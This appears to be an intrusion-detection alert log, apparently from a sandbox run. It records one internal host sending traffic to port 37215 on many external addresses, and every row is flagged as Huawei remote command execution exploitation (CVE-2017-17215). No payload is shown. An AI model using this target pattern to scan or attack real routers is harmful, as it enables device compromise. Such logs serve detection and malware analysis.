                                                        06/13/24-21:32:36.262323TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3475837215192.168.2.14197.210.225.41
                                                        06/13/24-21:32:36.262268TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3299037215192.168.2.1441.145.23.159
                                                        06/13/24-21:32:40.373238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3431037215192.168.2.14197.70.48.201
                                                        06/13/24-21:32:23.945778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4737437215192.168.2.14197.136.187.10
                                                        06/13/24-21:32:21.785303TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4549637215192.168.2.14197.253.85.64
                                                        06/13/24-21:32:42.406399TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4060637215192.168.2.1441.212.41.84
                                                        06/13/24-21:33:13.212803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5244237215192.168.2.14156.69.189.166
                                                        06/13/24-21:33:17.303864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3316037215192.168.2.14197.189.88.235
                                                        06/13/24-21:32:38.316139TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4673637215192.168.2.1441.185.141.244
                                                        06/13/24-21:33:04.989249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5473437215192.168.2.1441.18.90.214
                                                        06/13/24-21:32:54.725998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4969237215192.168.2.14197.17.14.60
                                                        06/13/24-21:32:28.048758TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4485037215192.168.2.14156.153.157.239
                                                        06/13/24-21:32:30.097683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4110237215192.168.2.14197.151.179.37
                                                        06/13/24-21:33:09.085772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4894237215192.168.2.14197.134.210.171
                                                        06/13/24-21:32:42.422694TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4729837215192.168.2.14197.184.110.216
                                                        06/13/24-21:32:17.676697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4476837215192.168.2.14197.198.118.207
                                                        06/13/24-21:32:21.803959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4643437215192.168.2.14197.198.9.104
                                                        06/13/24-21:32:48.555062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5354037215192.168.2.14156.28.255.53
                                                        06/13/24-21:32:36.263248TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3393637215192.168.2.14156.17.212.224
                                                        06/13/24-21:32:52.658286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3621437215192.168.2.14197.205.88.129
                                                        06/13/24-21:32:54.708028TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3679437215192.168.2.14156.183.166.63
                                                        06/13/24-21:32:03.279737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5520837215192.168.2.14156.134.246.13
                                                        06/13/24-21:32:44.453025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5334837215192.168.2.14156.22.235.188
                                                        06/13/24-21:32:56.783515TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5065437215192.168.2.14197.38.195.69
                                                        06/13/24-21:33:15.273305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3298237215192.168.2.1441.252.137.48
                                                        06/13/24-21:32:11.485738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5344037215192.168.2.14197.168.108.247
                                                        06/13/24-21:33:17.305686TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6060037215192.168.2.1441.56.170.0
                                                        06/13/24-21:32:28.023729TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5747037215192.168.2.14156.228.3.140
                                                        06/13/24-21:32:17.672572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4993637215192.168.2.14156.234.8.206
                                                        06/13/24-21:32:15.631055TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5491637215192.168.2.14197.91.85.206
                                                        06/13/24-21:32:58.824272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5079637215192.168.2.14197.106.42.22
                                                        06/13/24-21:32:21.783374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5304637215192.168.2.1441.84.246.141
                                                        06/13/24-21:32:01.221809TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5519637215192.168.2.14156.53.90.107
                                                        06/13/24-21:32:03.299264TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4794237215192.168.2.14197.200.253.22
                                                        06/13/24-21:32:05.345186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5127637215192.168.2.14197.223.83.161
                                                        06/13/24-21:32:01.238778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3570437215192.168.2.1441.41.164.139
                                                        06/13/24-21:33:17.306772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5662037215192.168.2.1441.23.221.130
                                                        06/13/24-21:32:52.657854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5945237215192.168.2.1441.149.241.63
                                                        06/13/24-21:33:02.954813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5058637215192.168.2.14156.225.89.225
                                                        06/13/24-21:32:09.438139TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4667837215192.168.2.14156.209.116.137
                                                        06/13/24-21:31:59.175155TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4022237215192.168.2.14156.46.236.126
                                                        06/13/24-21:32:01.240389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4704437215192.168.2.14156.190.3.255
                                                        06/13/24-21:32:15.609492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6059437215192.168.2.14156.123.68.16
                                                        06/13/24-21:33:07.060258TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3811637215192.168.2.1441.67.151.85
                                                        06/13/24-21:32:30.124652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4299237215192.168.2.1441.212.96.140
                                                        06/13/24-21:32:25.993825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5016437215192.168.2.1441.57.117.170
                                                        06/13/24-21:32:36.265034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3782037215192.168.2.14156.201.129.14
                                                        06/13/24-21:32:15.605886TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5706837215192.168.2.14156.207.65.229
                                                        06/13/24-21:32:44.475896TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4622237215192.168.2.14156.49.17.199
                                                        06/13/24-21:32:52.656211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5138637215192.168.2.1441.51.21.176
                                                        06/13/24-21:32:54.710174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5599237215192.168.2.14197.63.63.13
                                                        06/13/24-21:32:36.247515TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3715037215192.168.2.1441.165.75.144
                                                        06/13/24-21:32:44.450412TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5410837215192.168.2.14197.96.205.37
                                                        06/13/24-21:33:05.013100TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3552237215192.168.2.14197.55.254.80
                                                        06/13/24-21:33:17.308540TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5364637215192.168.2.1441.118.128.113
                                                        06/13/24-21:32:28.025884TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5174237215192.168.2.1441.128.16.22
                                                        06/13/24-21:32:30.075211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4434837215192.168.2.14197.103.13.128
                                                        06/13/24-21:33:02.912258TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3499037215192.168.2.1441.235.22.75
                                                        06/13/24-21:32:23.836302TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3910237215192.168.2.14156.219.163.144
                                                        06/13/24-21:33:02.912958TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6026637215192.168.2.14156.158.145.108
                                                        06/13/24-21:32:30.098751TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4899237215192.168.2.14156.125.210.101
                                                        06/13/24-21:33:05.017219TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5099437215192.168.2.1441.195.214.170
                                                        06/13/24-21:32:23.932606TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5796237215192.168.2.14156.87.82.62
                                                        06/13/24-21:32:11.485276TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4601637215192.168.2.14197.194.73.113
                                                        06/13/24-21:32:30.077205TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6077037215192.168.2.14197.11.186.131
                                                        06/13/24-21:32:01.222891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5122437215192.168.2.14197.57.102.78
                                                        06/13/24-21:32:46.502412TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4275237215192.168.2.14197.184.113.28
                                                        06/13/24-21:32:01.241021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5779437215192.168.2.14197.51.147.125
                                                        06/13/24-21:32:09.456638TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5100637215192.168.2.14156.130.83.217
                                                        06/13/24-21:32:54.708541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5131437215192.168.2.14197.138.152.48
                                                        06/13/24-21:32:48.550169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3407237215192.168.2.1441.222.160.55
                                                        06/13/24-21:32:54.710678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5309637215192.168.2.14156.189.217.210
                                                        06/13/24-21:32:56.754526TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3309437215192.168.2.1441.51.93.237
                                                        06/13/24-21:32:46.527762TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5835837215192.168.2.14197.199.50.31
                                                        06/13/24-21:32:03.275874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5953437215192.168.2.1441.226.180.166
                                                        06/13/24-21:32:54.708852TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5705637215192.168.2.1441.62.145.187
                                                        06/13/24-21:33:00.886422TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6084037215192.168.2.14197.140.131.134
                                                        06/13/24-21:32:54.709982TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4817637215192.168.2.14156.234.27.221
                                                        06/13/24-21:32:05.377813TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4912837215192.168.2.14197.159.92.94
                                                        06/13/24-21:33:09.112448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3317237215192.168.2.14197.170.29.19
                                                        06/13/24-21:32:21.786256TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4414237215192.168.2.1441.124.62.186
                                                        06/13/24-21:32:25.970065TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5631637215192.168.2.14156.76.102.92
                                                        06/13/24-21:32:48.555666TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4829637215192.168.2.1441.223.123.204
                                                        06/13/24-21:32:42.407388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4368637215192.168.2.14156.9.20.170
                                                        06/13/24-21:32:50.609976TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5901637215192.168.2.14197.198.149.6
                                                        06/13/24-21:32:03.274331TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6094237215192.168.2.14197.133.27.79
                                                        06/13/24-21:32:25.996053TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4074437215192.168.2.14156.252.192.220
                                                        06/13/24-21:32:11.508818TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5594237215192.168.2.14197.246.209.31
                                                        06/13/24-21:32:07.416939TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4771237215192.168.2.1441.238.95.131
                                                        06/13/24-21:32:34.191939TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5679637215192.168.2.14197.116.194.189
                                                        06/13/24-21:32:09.439993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4922237215192.168.2.14197.83.173.81
                                                        06/13/24-21:32:01.220569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6026837215192.168.2.14156.212.38.36
                                                        06/13/24-21:32:40.356208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4202037215192.168.2.14197.46.60.187
                                                        06/13/24-21:32:52.679390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4043837215192.168.2.14156.220.31.248
                                                        06/13/24-21:32:19.730329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4181637215192.168.2.1441.89.88.39
                                                        06/13/24-21:32:58.839246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6096437215192.168.2.1441.67.232.44
                                                        06/13/24-21:32:28.045562TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5148837215192.168.2.1441.118.166.105
                                                        06/13/24-21:33:11.156742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5151037215192.168.2.1441.197.123.124
                                                        06/13/24-21:32:38.300652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3731437215192.168.2.14197.59.197.95
                                                        06/13/24-21:32:58.823627TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3540437215192.168.2.1441.63.163.106
                                                        06/13/24-21:33:11.161007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5397837215192.168.2.1441.174.70.98
                                                        06/13/24-21:32:36.269646TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3778837215192.168.2.14156.206.112.238
                                                        06/13/24-21:33:02.954047TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5351637215192.168.2.14197.8.102.4
                                                        06/13/24-21:32:56.756804TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4809237215192.168.2.1441.81.108.25
                                                        06/13/24-21:33:13.213046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4377837215192.168.2.1441.74.162.246
                                                        06/13/24-21:32:44.453198TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5168637215192.168.2.14197.212.37.233
                                                        06/13/24-21:32:25.996911TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4966837215192.168.2.1441.77.121.20
                                                        06/13/24-21:32:15.604098TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3832237215192.168.2.1441.172.158.8
                                                        06/13/24-21:31:59.196806TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4365037215192.168.2.14156.247.65.190
                                                        06/13/24-21:32:32.155437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3568437215192.168.2.1441.96.247.249
                                                        06/13/24-21:32:38.305507TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4004237215192.168.2.14156.200.28.245
                                                        06/13/24-21:33:09.109779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4848437215192.168.2.14156.199.80.117
                                                        06/13/24-21:33:15.271879TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4216437215192.168.2.14156.191.237.20
                                                        06/13/24-21:32:07.402727TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5557437215192.168.2.14156.78.96.74
                                                        06/13/24-21:32:30.125627TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3725437215192.168.2.14197.212.117.102
                                                        06/13/24-21:32:15.634588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5312837215192.168.2.14197.240.191.7
                                                        06/13/24-21:32:15.638269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5431837215192.168.2.1441.187.54.53
                                                        06/13/24-21:32:30.123693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3595637215192.168.2.14156.163.83.36
                                                        06/13/24-21:32:48.568053TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4695637215192.168.2.14156.140.179.36
                                                        06/13/24-21:33:11.154620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3879037215192.168.2.14156.223.203.100
                                                        06/13/24-21:32:21.784220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4699637215192.168.2.14156.34.19.106
                                                        06/13/24-21:32:09.436290TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5378837215192.168.2.14156.138.171.240
                                                        06/13/24-21:32:11.485998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4515637215192.168.2.1441.64.227.161
                                                        06/13/24-21:32:17.696947TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4225037215192.168.2.14197.2.98.8
                                                        06/13/24-21:32:38.318491TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3602837215192.168.2.14156.180.101.170
                                                        06/13/24-21:33:13.212403TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3975437215192.168.2.14156.246.134.32
                                                        06/13/24-21:33:02.910306TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3808237215192.168.2.1441.164.123.163
                                                        06/13/24-21:32:21.784100TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3324837215192.168.2.14156.133.228.46
                                                        06/13/24-21:33:13.211355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5155637215192.168.2.14197.251.165.111
                                                        06/13/24-21:33:15.275070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5628037215192.168.2.1441.43.93.15
                                                        06/13/24-21:31:57.137140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6013237215192.168.2.1441.107.231.137
                                                        06/13/24-21:32:46.527679TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4993637215192.168.2.14156.183.67.52
                                                        06/13/24-21:32:30.100531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5717237215192.168.2.1441.222.245.128
                                                        06/13/24-21:32:25.977938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3913237215192.168.2.1441.189.48.65
                                                        06/13/24-21:32:36.269746TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4878237215192.168.2.14156.196.98.181
                                                        06/13/24-21:32:21.780663TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3898037215192.168.2.1441.38.128.253
                                                        06/13/24-21:32:23.941392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4217437215192.168.2.1441.86.79.234
                                                        06/13/24-21:32:44.450935TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4105237215192.168.2.14197.60.160.166
                                                        06/13/24-21:33:17.307175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5882437215192.168.2.14197.123.149.146
                                                        06/13/24-21:31:57.130334TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3803037215192.168.2.1441.111.116.8
                                                        06/13/24-21:32:23.933012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5937037215192.168.2.14156.175.17.216
                                                        06/13/24-21:32:17.697353TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4739437215192.168.2.14197.67.147.65
                                                        06/13/24-21:32:34.191342TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3927437215192.168.2.14197.141.183.48
                                                        06/13/24-21:32:50.612643TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3717237215192.168.2.14197.186.115.73
                                                        06/13/24-21:32:56.756960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3351437215192.168.2.1441.180.220.40
                                                        06/13/24-21:32:11.507269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4250637215192.168.2.1441.148.153.36
                                                        06/13/24-21:32:09.440651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4673437215192.168.2.14156.194.232.216
                                                        06/13/24-21:32:48.554838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5197837215192.168.2.1441.147.104.63
                                                        06/13/24-21:33:11.176865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4103437215192.168.2.14156.156.164.219
                                                        06/13/24-21:32:25.969038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5271637215192.168.2.14156.206.60.21
                                                        06/13/24-21:32:38.296015TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5252637215192.168.2.14156.26.215.185
                                                        06/13/24-21:32:07.418268TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3739437215192.168.2.14156.18.118.167
                                                        06/13/24-21:33:02.954228TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4142437215192.168.2.14197.36.54.14
                                                        06/13/24-21:32:34.199650TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5267837215192.168.2.1441.140.200.51
                                                        06/13/24-21:32:01.222794TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4486637215192.168.2.1441.230.52.172
                                                        06/13/24-21:32:17.676637TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5505037215192.168.2.14156.35.170.68
                                                        06/13/24-21:32:52.659946TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3534637215192.168.2.14197.93.16.215
                                                        06/13/24-21:33:05.017157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3620837215192.168.2.14156.146.11.155
                                                        06/13/24-21:33:11.157200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4848237215192.168.2.14156.40.8.25
                                                        06/13/24-21:32:46.503639TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5481437215192.168.2.14197.229.197.203
                                                        06/13/24-21:33:15.273345TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4308837215192.168.2.14156.125.16.199
                                                        06/13/24-21:32:30.078044TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3283237215192.168.2.14197.36.208.43
                                                        06/13/24-21:32:46.503962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4388237215192.168.2.14197.132.253.232
                                                        06/13/24-21:32:11.509979TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4261637215192.168.2.14156.229.210.10
                                                        06/13/24-21:32:21.782554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3561037215192.168.2.1441.5.250.34
                                                        06/13/24-21:32:15.607654TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5237237215192.168.2.14197.15.245.188
                                                        06/13/24-21:32:15.630254TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4075437215192.168.2.1441.138.52.192
                                                        06/13/24-21:32:38.304537TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4535037215192.168.2.14156.56.181.222
                                                        06/13/24-21:32:01.221844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5882837215192.168.2.1441.99.47.11
                                                        06/13/24-21:32:25.992549TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5398037215192.168.2.14197.76.210.140
                                                        06/13/24-21:32:11.508913TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3526637215192.168.2.14197.150.93.34
                                                        06/13/24-21:32:34.213056TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4653037215192.168.2.1441.21.243.102
                                                        06/13/24-21:33:09.129938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4283037215192.168.2.14197.158.9.212
                                                        06/13/24-21:32:46.509552TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3558837215192.168.2.14197.181.149.95
                                                        06/13/24-21:32:07.417303TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6004437215192.168.2.14197.215.126.123
                                                        06/13/24-21:33:05.014150TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5546637215192.168.2.14156.240.61.24
                                                        06/13/24-21:32:40.377861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5438037215192.168.2.14156.182.175.253
                                                        06/13/24-21:32:32.166995TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4076837215192.168.2.1441.29.203.153
                                                        06/13/24-21:32:13.565908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4158437215192.168.2.14197.129.93.39
                                                        06/13/24-21:32:54.725837TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5709437215192.168.2.14197.195.154.96
                                                        06/13/24-21:32:25.991111TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5240037215192.168.2.14156.34.107.117
                                                        06/13/24-21:32:44.457030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4385637215192.168.2.14156.59.207.47
                                                        06/13/24-21:33:13.231623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4259037215192.168.2.1441.58.239.55
                                                        06/13/24-21:33:02.913936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4508237215192.168.2.1441.218.240.176
                                                        06/13/24-21:32:56.788674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4048837215192.168.2.14156.175.105.29
                                                        06/13/24-21:32:25.995500TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3337437215192.168.2.1441.3.88.236
